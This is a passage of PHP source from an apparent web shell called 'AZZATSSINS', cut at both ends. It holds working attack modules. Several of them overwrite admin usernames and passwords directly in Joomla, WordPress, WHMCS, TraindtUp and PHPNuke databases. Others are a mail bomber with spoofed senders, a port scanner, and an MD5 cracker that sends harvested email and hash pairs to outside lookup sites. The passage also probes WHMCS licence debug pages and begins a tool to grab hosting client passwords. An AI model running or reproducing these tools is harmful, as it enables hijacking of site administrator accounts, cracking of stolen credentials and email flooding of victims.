  1005. <input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
  1006. <tr><td>&nbsp;&nbsp;New User</td><td>
  1007. <input style='width:270px;' class='inputz' name='admin' value='azzatssins' /></td></tr>
  1008. <tr><td>&nbsp;&nbsp;New Pass </td>
  1009. <td>123456 = <input style='width:160px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />&nbsp;</td></tr>
  1010. <tr><td><input style='width:130%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
  1011. </td></tr></table><br>";
  1012. } else {
  1013. $localhost = $_POST['localhost'];
  1014. $database  = $_POST['database'];
  1015. $username  = $_POST['username'];
  1016. $password  = $_POST['password'];
  1017. $pwd   = $_POST['pwd'];
  1018. $admin = $_POST['admin'];
  1019. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  1020. @mysql_select_db($database) or die(mysql_error());
  1021. $hash = crypt($pwd);
  1022. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
  1023. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
  1024. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
  1025. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
  1026. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
  1027. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
  1028. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
  1029. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
  1030. if($SQL){
  1031. echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
  1032. }
  1033. }
  1034. echo "</div>";
  1035. }
  1036. ?>
  1037. <?php
  1038. if (isset($_GET['AZZATSSINS']) && ($_GET['AZZATSSINS'] == 'WPASS')) {
  1039. ?>
  1040. <form action="?&amp;AZZATSSINS=WPASS" method="post">
  1041. <?php
  1042. echo "
  1043. <center><br/><br/><nobr><b><span class='b7'>O=:[ WORDPRESS USER</span> <span class='b8'> CHANGE ]:=O</span></b></nobr><br/><br/> ";
  1044.  
  1045. if(empty($_POST['pwd'])){
  1046. echo "<FORM method='POST'>
  1047. <table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  1048. <input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
  1049. <input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
  1050. <input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
  1051. <input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
  1052. <tr><td>&nbsp;&nbsp;User baru</td><td>
  1053. <input style='width:220px;' class='inputz' type='text' name='admin' value='azzatssins' /></td></tr>
  1054. <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
  1055. <input style='width:80px;' class='inputz' type='text' name='pwd' value='17081945' />&nbsp;
  1056.  
  1057. <input style='width:19%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
  1058. </td></tr> </table><br><br><br><br>
  1059. ";
  1060. }else{
  1061. $localhost = $_POST['localhost'];
  1062. $database  = $_POST['database'];
  1063. $username  = $_POST['username'];
  1064. $password  = $_POST['password'];
  1065. $pwd   = $_POST['pwd'];
  1066. $admin = $_POST['admin'];
  1067. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  1068. @mysql_select_db($database) or die(mysql_error());
  1069.  
  1070. $hash = crypt($pwd);
  1071. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
  1072. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
  1073. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
  1074. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
  1075. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
  1076. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
  1077. $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
  1078. if($a4s){
  1079. echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
  1080. }
  1081. }
  1082. echo "</div>";
  1083. }
  1084. if($_GET['AZZATSSINS']=="encrypt"){
  1085. echo "
  1086. <table bgcolor=#cccccc width=\"100%\">
  1087. <tbody><tr><td align=\"right\" width=100>
  1088. <p dir=ltr><b><font color=#990000  size=-2><br><p align=left><center>
  1089.  
  1090. Encypton With ( MD5 | Base64 | Crypt | SHA1 | MD4 | SHA256 )<br><br>
  1091. <form method=\"POST\">
  1092. <font color=\"gray\">String To Encrypt : </font><input type=\"text\" value=\"\" name=\"ENCRYPTION\">
  1093. <input type=\"submit\" value=\"Submit\"></form>";
  1094. if(!$_POST['ENCRYPTION']=='')
  1095. {
  1096. $md5 = $_POST['ENCRYPTION'];
  1097.     echo "<font color=gray>MD5 : </font>".md5($md5)."<br>";
  1098.     echo "<font color=gray>Base64 : </font>".base64_encode($md5)."<br>";
  1099.     echo "<font color=gray>Crypt : </font>".CRYPT($md5)."<br>";
  1100.     echo "<font color=gray>SHA1 : </font>".SHA1($md5)."<br>";
  1101.     echo "<font color=gray>MD4 : </font>".hash("md4",$md5)."<br>";
  1102.     echo "<font color=gray>SHA256 : </font>".hash("sha256",$md5)."<br></tbody></tr></td></table>";
  1103.   }
  1104. }
  1105. if($_GET['open']=="ports"){
  1106. $rstart = (isset($_POST['rstart']) and is_numeric($_POST['rstart']) and $_POST['rstart'] >= 1) ? $_POST['rstart'] : 1 ;
  1107.         $rend = (isset($_POST['rend']) and is_numeric($_POST['rend']) and $_POST['rend'] > 1) ? $_POST['rend'] : 999999 ;
  1108.         echo("<script type=\"text/javascript\">");
  1109.         echo("function Show(SelectValue){");
  1110.         echo("document.getElementById('RangeDiv').style.display=\"none\";");
  1111.         echo("document.getElementById('SpecificDiv').style.display=\"none\";");
  1112.         echo("if(SelectValue == \"range\")");
  1113.         echo("document.getElementById('RangeDiv').style.display=\"inline\";");
  1114.         echo("if(SelectValue == \"specific\")");
  1115.         echo("document.getElementById('SpecificDiv').style.display=\"inline\";");
  1116.         echo("}</script>");
  1117.         echo("<span class=\"PageTitle\">Open Ports Scanner</span><br /><br />");
  1118.         echo('<form method="post">');
  1119.         echo('<u>Ports:</u><br /><br />');
  1120.         echo('<select id="port" name="port" onchange="javascript:Show(this.value);">');
  1121.         echo('<option value="automatic">Automatic - All Ports</option>');
  1122.         echo('<option value="range">Range of Ports</option>');
  1123.         echo('<option value="specific">Specific Ports</option>');
  1124.         echo('</select><br /><br />');
  1125.         echo('<div id="RangeDiv" style="display:none;">From: <input type="text" id="rstart" name="rstart" value="'.$rstart.'" /> To: <input type="text" id="rend" name="rend" value="'.$rend.'" /><br /><br /></div>');
  1126.         echo('<div id="SpecificDiv" style="display:none;"><textarea rows="5" cols="50" id="specific" name="specific" />'.@htmlspecialchars($_POST['specific']).'</textarea><br />Use space (not new line!) to separate between the ports.<br /><br /></div>');
  1127.         echo('<input type="submit" id="submit" name="submit" value="Scan" />');
  1128.         echo('</form>');
  1129.         if(isset($_POST['submit'])){
  1130.             $first = "yes";
  1131.             echo("<br /><br /><u>Results</u>:<br />\n");
  1132.  
  1133.             if($_POST['port'] == "range"){
  1134.                 if($rend > $rstart){
  1135.                     for($i=$rstart;$i<$rend;$i++){
  1136.                         if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
  1137.                             if($first == "no")
  1138.                                 echo(", ");
  1139.                             echo $i;
  1140.                             $first = "no";
  1141.                         }
  1142.                     }
  1143.                     echo(".");
  1144.                 }
  1145.                 else{
  1146.                     echo("Range start number can't be bigger than the end number.");
  1147.                 }
  1148.             }
  1149.             else if($_POST['port'] == "specific"){
  1150.                 $list = explode(" ",$_POST['specific']);
  1151.                 foreach($list as $i){
  1152.                     if(is_numeric($i)){
  1153.                         if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
  1154.                             if($first == "no")
  1155.                                 echo(", ");
  1156.                             echo $i;
  1157.                             $first = "no";
  1158.                         }
  1159.                     }
  1160.                 }
  1161.                 echo(".");
  1162.             }
  1163.             else{
  1164.                 for($i=0;$i>=0;$i++){
  1165.                     if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
  1166.                         if($first == "no")
  1167.                             echo(", ");
  1168.                         echo $i;
  1169.                         $first = "no";
  1170.                     }
  1171.                 }
  1172.                 echo(".");
  1173.             }
  1174.         }
  1175. }
  1176. if($_GET['AZZATSSINS']=="BOMAIL"){
  1177.  ?>
  1178. <?php
  1179. /**
  1180. AZZATSSINS
  1181. **/
  1182.  
  1183. $kontol = 'Mail Bomber Siap Siaga...';
  1184.  
  1185. function boombardir($text){
  1186.     if (!get_magic_quotes_gpc()){
  1187.         return $text;
  1188.     }
  1189.     return stripslashed($text);
  1190. }
  1191. if(isset($_POST['kirim_email'])){
  1192.     $mail_to = $_POST['mail_to'];
  1193.     $fromname = $_POST['from_name'];
  1194.     $fromaddress = $_POST['mail_from'];
  1195.     $mail_subject = $_POST['mail_subject'];
  1196.     $mail_content = boombardir($_POST['mail_content']);
  1197.  
  1198.     $fuckline = "\n\t";
  1199.     $headers = "From: ".$fromname." <".$fromaddress."> ".$fuckline;
  1200.  
  1201.     if (($_POST['banyak_email']) <=1) {
  1202.         if(@mail($mail_to,$mail_subject,$mail_content,$headers)){
  1203.             $kontol = "email sent to $mail_to";
  1204.         }
  1205.         else $kontol = "Mail Sending is <font color=red> Failed </font> .";
  1206.     }
  1207.     elseif (($_POST['banyak_email']) > 1){
  1208.         $intibom = $_POST['banyak_email'];
  1209.         $kabehe = 0; $kabehekirim=0; $msgtf=0;
  1210.         for ($i=1; $i <= $intibom; $i++) {
  1211.             $acakjudul = substr(md5($i."slackerc0de"),-4);
  1212.             $mailsubject = $mail_subject." - ".$acakjudul;
  1213.             if(@mail($mail_to,$mailsubject,$mail_content,$headers)){
  1214.                 $kabehekirim++;
  1215.             } else {
  1216.                 $msgtf++;
  1217.             }
  1218.             $kabehe++;
  1219.         }
  1220.     $kontol = "<font color=red> $msgtf </font> | <font color=red> $kabehekirim </font>Success | of total $kabehe emails sending to : $mail_to </br> From: $fromadress <br />Subject: $mail_subject <br />Content: $mail_content";
  1221.     }
  1222. }
  1223. ?>
  1224. <body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  1225. <br /><br />
  1226. <form class="brd" method="post" style="border:1px solid #008000; padding:15px; text-align:left; -moz-border-radius: 10px; border-radius: 10px;" >
  1227. <table style="padding: 0 0 0 30px">
  1228. <tr><td><br />
  1229.     <table style="padding: 0 0 0 30px">
  1230.         <tr><td width="100">Target eMail :<td width="300">
  1231.             <input style="witdh:250px;" type="text" value="<?php if(mail_to) {echo "$mail_to";} ?>" name="mail_to" />
  1232.         </tr></td>
  1233.         <tr><td>Sender Name :<td width="300">
  1234.             <input style="witdh:250px;" type="text" value="<?php if(fromname) {echo "$fromname";} ?>" name="from_name" />
  1235.         </tr></td>
  1236.         <tr><td>Sender eMail :<td width="300">
  1237.             <input style="witdh:250px;" type="text" value="<?php if(fromaddress) {echo "$fromaddress";} ?>" name="mail_from" />
  1238.         </tr></td>
  1239.         <tr><td>Subject :<td width="300">
  1240.             <input style="witdh:250px;" type="text" value="<?php if(mail_subject) {echo "$mail_subject";} ?>" name="mail_subject" />
  1241.         </tr></td>
  1242.         <tr><td>Total of Send :<td width="300">
  1243.             <input style="witdh:87px;" type="number" value="<?php if($_POST['banyak_email']) {echo $_POST['banyak_email'];} else {echo '100';} ?>" name="banyak_email" />
  1244.             <input style="witdh:140px;" type="submit" value=" SUBMIT " name="kirim_email" />
  1245.         </tr></td>
  1246.     </table>
  1247. </td></tr>
  1248. <tr><td><br />
  1249. Message :
  1250. <center>
  1251.     <textarea name="mail_content" cols="60" rows="8" >
  1252.         <?php
  1253.             if ($mail_content) {
  1254.                 echo "mail_content";
  1255.             }
  1256.         ?>
  1257.     </textarea>
  1258. </center>
  1259. </td></tr>
  1260. </table>
  1261. </form><br />
  1262. <div class="brd" style="border:1px solid #008000; padding:15px; font-size:11px: text-align:left;">
  1263.     <?php
  1264. echo "$kontol";
  1265. ?>
  1266. <?php }
  1267.  
  1268. if($_GET['whmcs']=="passchanger"){
  1269. ?>
  1270. <p><br/><body>
  1271. <center><nobr><b><span class="b7">O=:[ PASSWORD</span> <span class="b8">CHANGER ]:=O</span></b></nobr><br/><br/>
  1272. <p><form method="post">
  1273. <table border=1>
  1274. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
  1275. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
  1276. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
  1277. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
  1278. <tr><td>id_admin</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="1" name="idmaho"></td></tr>
  1279. <tr><td>new_username</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="azzatssins" name="userbaru"></td></tr>
  1280. <tr><td>new_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="17081945" name="passbaru"></td></tr>
  1281.  
  1282. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  1283. </table>
  1284. <br>
  1285. </form>
  1286. </center>
  1287.  
  1288. <?php
  1289. if(isset($_POST['plapon'])) {
  1290. $anu1 = $_POST['anu1'];
  1291. $anu2 = $_POST['anu2'];
  1292. $anu3 = $_POST['anu3'];
  1293. $anu4 = $_POST['anu4'];
  1294. @mysql_connect($anu1,$anu2,$anu3);
  1295. @mysql_select_db($anu4);
  1296.  
  1297. $idmaho=str_replace("\'","'",$idmaho);
  1298. $target_id = $_POST['idmaho'];
  1299. $userbaru=str_replace("\'","'",$userbaru);
  1300. $ganti_user = $_POST['userbaru'];
  1301. $passbaru=str_replace("\'","'",$passbaru);
  1302.  
  1303. $hash_pass = $_POST['passbaru'];
  1304. $ganti_pass = md5($hash_pass);
  1305.  
  1306. $colox = "UPDATE tbladmins SET username ='".$ganti_user."' WHERE id ='".$target_id."'";
  1307. $coloxx = "UPDATE tbladmins SET password ='".$ganti_pass."' WHERE id ='".$target_id."'";
  1308.  
  1309. $udah_ganteng=@mysql_query($colox);
  1310. $udah_ganteng=@mysql_query($coloxx);
  1311. if($udah_ganteng)
  1312. {
  1313. echo "<font color='lime'>SUKSES BOS  GANTENG :P</font>";
  1314. }
  1315. }
  1316. }
  1317.  
  1318.  
  1319. if($_GET['md5']=="decrypter"){
  1320. set_time_limit(0);
  1321. ?>
  1322. <script type="text/javascript" src="http://code.jquery.com/jquery-1.10.2.min.js"></script>
  1323. <script type="text/JavaScript">
  1324. $(document).ready(function(){
  1325. $('pre').fadeIn(3000);
  1326.  
  1327. $('input[type="text"]').click(function(){
  1328. $(this).val('');
  1329. });
  1330.  
  1331.  
  1332.  
  1333. });
  1334.  
  1335. </script>
  1336.  
  1337. <?
  1338. if(!empty($_POST['password'])){
  1339. set_time_limit(0);
  1340. $password = nl2br($_POST['password']);
  1341.  
  1342. $ex = explode("<br />",$password);
  1343.  
  1344. $total_checked = 0;
  1345. $total_cracked = 0;
  1346. $total_failed  = 0;
  1347. $total_not_md5 = 0;
  1348.  
  1349. foreach($ex as $cracking_password){
  1350. $total_checked++;
  1351. $cracking_passwords   = explode("|",$cracking_password);
  1352. $cracking_password    = explode("|",$cracking_password);
  1353. $cracking_password    = $cracking_password[1];
  1354. echo $cracking_passwords[0]."|";
  1355. $cracking_password    = trim($cracking_password);
  1356. $regex = "/[a-z0-9]{32}/i";
  1357.  
  1358. if(preg_match($regex,$cracking_password)){
  1359. $curl_crack = curl_init();
  1360.  
  1361. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5online.net");
  1362. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  1363. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"pass=".$cracking_password."&option=hash2text&send=Submit");
  1364. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  1365. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  1366. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  1367. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  1368.  
  1369.  
  1370. $exec = curl_exec($curl_crack);
  1371.  
  1372.  
  1373. if(preg_match("/pass : (.*)/",$exec,$cracked)){
  1374. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font>";
  1375. $total_cracked++;
  1376. flush();
  1377. }else{
  1378.  
  1379. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5decryption.com");
  1380. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  1381. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password."&submit=Decrypt+It%21");
  1382. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  1383. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  1384. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  1385. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  1386. $exec = curl_exec($curl_crack);
  1387.  
  1388.  
  1389.  
  1390. if(preg_match("/<font size=.*>(.+)<\/font>/",$exec,$cracked)){
  1391. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
  1392. $total_cracked++;
  1393. flush();
  1394. }else{
  1395. $curl_crack = curl_init();
  1396. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5pass.info");
  1397. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  1398. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password."&get_pass=Get+Pass");
  1399. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  1400. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  1401. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  1402. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  1403.  
  1404.  
  1405.  
  1406. $exec = curl_exec($curl_crack);
  1407.  
  1408. if(preg_match("/Password - <b>(.*)<\/b>/",$exec,$cracked)){
  1409. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
  1410. $total_cracked++;
  1411. flush();
  1412. }else{
  1413. $curl_crack = curl_init();
  1414. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5.noisette.ch");
  1415. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  1416. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password);
  1417. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  1418. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  1419. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  1420. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  1421.  
  1422.  
  1423.  
  1424. $exec = curl_exec($curl_crack);
  1425.  
  1426.  
  1427.  
  1428. if(preg_match('/= md5\("(.*)"\)/',$exec,$cracked)){
  1429. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
  1430. $total_cracked++;
  1431. flush();
  1432. }else{
  1433.  
  1434. echo "<font size='2' color='red'><b>Not Found</b></font><br />";
  1435. $total_failed++;
  1436. flush();
  1437.  
  1438. }// Next update put the fifth website here
  1439.  
  1440. }
  1441. }
  1442.  
  1443.  
  1444.  
  1445.  
  1446.  
  1447.  
  1448.  
  1449.  
  1450.  
  1451.  
  1452.  
  1453.  
  1454. }
  1455. }
  1456.  
  1457. else{
  1458. $total_not_md5++;
  1459. echo $cracking_password."<br />";
  1460. flush();
  1461. continue;
  1462. }
  1463. //close curl //curl_close($curl_crack);
  1464. }
  1465.  
  1466. echo "<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'><br><font size='2'>Total Password Checked : </font><b><font size='2'>".$total_checked."</font></b><br><font size='2' color='green'> Total Password Cracked : </font><font size='2'>".$total_cracked." </font><br><font size='2' color='red'> Total Password Faild : </font><b><font size='2'>".$total_failed."</font></b>"." </font><br><font size='2' color='orange'> Total Note Md5 : </font><b><font size='2'>".$total_not_md5."</font></b>";
  1467. }else{
  1468. ?>
  1469. <body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  1470. <center>
  1471. <form method="POST">
  1472.  
  1473.  
  1474. </textarea> <textarea cols='70' rows='15' name="password" placeholder="EMAIL|MD5"></textarea>
  1475.  
  1476. <br><br>
  1477. <input type="submit" name="crack" value="Crack Password">
  1478. <br>
  1479. </form>
  1480. </center>
  1481. <?
  1482. }}
  1483.  
  1484. if($_GET['traindt']=="login"){
  1485. set_time_limit(0);
  1486. echo "<html><head><title>TraindtUpLoginChanger</title></head>";
  1487. echo "<body><center>
  1488. <h2>AZZATSSINS</h2>
  1489. <h3>TraindtUp UsEr-PaSs FuCk3r</h3>
  1490. <form method=POST action=''>
  1491. DB HOST<br/>
  1492. <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
  1493. DB NAME<br/>
  1494. <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
  1495. DB USER<br/>
  1496. <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
  1497. DB PASSWORD<br/>
  1498. <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
  1499. <hr style='color:lime;'> <p>TARGET ID ADMIN MAHO<br/>
  1500. <input value='1' style='color:lime;background-color:#000000' type=text name=idmaho size='20'><br/>
  1501. NEW ADMIN LOGIN USER<br/>
  1502. <input value=admin-ganteng style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
  1503. NEW ADMIN LOGIN PASS<br/>
  1504. <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
  1505.  
  1506. <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
  1507.  
  1508. $anu1 = $_POST['anu1'];
  1509. $anu2 = $_POST['anu2'];
  1510. $anu3 = $_POST['anu3'];
  1511. $anu4 = $_POST['anu4'];
  1512. @mysql_connect($anu1,$anu3,$anu4);
  1513. @mysql_select_db($anu2);
  1514.  
  1515. $idmaho=str_replace("\'","'",$idmaho);
  1516. $target_id = $_POST['idmaho'];
  1517.  
  1518. $userbaru=str_replace("\'","'",$userbaru);
  1519. $ganti_user = $_POST['userbaru'];
  1520.  
  1521. $passbaru=str_replace("\'","'",$passbaru);
  1522. $hash_pass = $_POST['passbaru'];
  1523. $ganti_pass = md5($hash_pass);
  1524.  
  1525. $sodok1 = "UPDATE admin SET admin_user ='".$ganti_user."' WHERE admin_id ='".$target_id."'";
  1526. $sodok2 = "UPDATE admin SET admin_password ='".$ganti_pass."' WHERE admin_id ='".$target_id."'";
  1527.  
  1528. $oke=@mysql_query($sodok1);
  1529. $oke=@mysql_query($sodok2);
  1530. if($oke)
  1531. {
  1532. echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
  1533. }
  1534. }
  1535.  
  1536. if($_GET['nuke']=="login"){
  1537. set_time_limit(0);
  1538. echo "<html><head><title>PHPNukeLoginChanger</title></head>";
  1539. echo "<body><center>
  1540. <h2>AZZATSSINS</h2>
  1541. <h3>PHPNuke UsEr-PaSs FuCk3r</h3>
  1542. <form method=POST action=''>
  1543. DB HOST<br/>
  1544. <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
  1545. DB NAME<br/>
  1546. <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
  1547. DB USER<br/>
  1548. <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
  1549. DB PASSWORD<br/>
  1550. <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
  1551. <hr style='color:lime;'>
  1552.  
  1553. TARGET PREFIX<br/>
  1554. <input style='color:lime;background-color:#000000' type=txt name=prefix size='20'><br/>
  1555. NEW ADMIN LOGIN USER<br/>
  1556. <input value=admin style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
  1557. NEW ADMIN LOGIN PASS<br/>
  1558. <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
  1559.  
  1560. <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
  1561.  
  1562. $anu1 = $_POST['anu1'];
  1563. $anu2 = $_POST['anu2'];
  1564. $anu3 = $_POST['anu3'];
  1565. $anu4 = $_POST['anu4'];
  1566. @mysql_connect($anu1,$anu3,$anu4);
  1567. @mysql_select_db($anu2);
  1568.  
  1569. $userbaru=str_replace("\'","'",$userbaru);
  1570. $ganti_user = $_POST['userbaru'];
  1571. $passbaru=str_replace("\'","'",$passbaru);
  1572. $hash_pass = $_POST['passbaru'];
  1573. $ganti_pass = md5($hash_pass);
  1574.  
  1575. $prefix = $_POST['prefix'];
  1576. $table_name1 = $prefix."users" ;
  1577. $table_name2 = $prefix."authors" ;
  1578.  
  1579. $okenuke1 = "UPDATE $table_name1 SET username ='".$ganti_user."' WHERE user_id ='2'";
  1580. $okenuke2 = "UPDATE $table_name1 SET user_password ='".$ganti_pass."' WHERE user_id ='2'";
  1581. $okenuke3= "UPDATE $table_name2 SET aid ='".$ganti_user."' WHERE radminsuper ='1'";
  1582. $okenuke4 = "UPDATE $table_name2 SET pwd ='".$ganti_pass."' WHERE radminsuper ='1'";
  1583.  
  1584. $oke=@mysql_query($okenuke1);
  1585. $oke=@mysql_query($okenuke2);
  1586. $oke=@mysql_query($okenuke3);
  1587. $oke=@mysql_query($okenuke4);
  1588. if($oke)
  1589. {
  1590. echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
  1591. }
  1592. }
  1593.  
  1594. if($_GET['ceck']=="whmcs"){
  1595. set_time_limit(0);
  1596. ?>
  1597.  <p><br/><body>
  1598. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ CHECK WHMCS</span> <span class="b8">LICENSE & VERSION ]:=O</span></b></nobr><br/><br/>
  1599. <p><form method="post">
  1600. <table border=1>
  1601. <tr><td>Hosting Site </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" value="http://" name="url"></td></tr>
  1602. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr></table>
  1603. <br></form></center>
  1604.  
  1605. <?php
  1606. @error_reporting(0);
  1607. @ini_set('log_errors',0);
  1608. @ini_set('error_log',NULL);
  1609. if(isset($_POST['plapon'])){
  1610. $target = $_POST['url'];
  1611. $bukadikitjoss = fopen("$target/?licensedebug","r");
  1612. $hasil = '';
  1613. while (!feof($bukadikitjoss)) {
  1614. $hasil .= fread($bukadikitjoss, 8192);
  1615. }
  1616. echo "<center><textarea style='color:#FF0000;background-color:#000000' cols='40' rows='15'>$hasil</textarea>";
  1617. }
  1618. echo "</table>";
  1619. }
  1620.  
  1621. if($_GET['whmcs']=="client"){
  1622. set_time_limit(0);
  1623. ?>
  1624. <p><br/><body>
  1625. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ GRAB PASSWORD</span> <span class="b8">CLIENT HOSTING ]:=O</span></b></nobr><br/><br/>
  1626. <p><form method="post">
  1627. <table border=1>
  1628. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
  1629. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
  1630. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
  1631. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
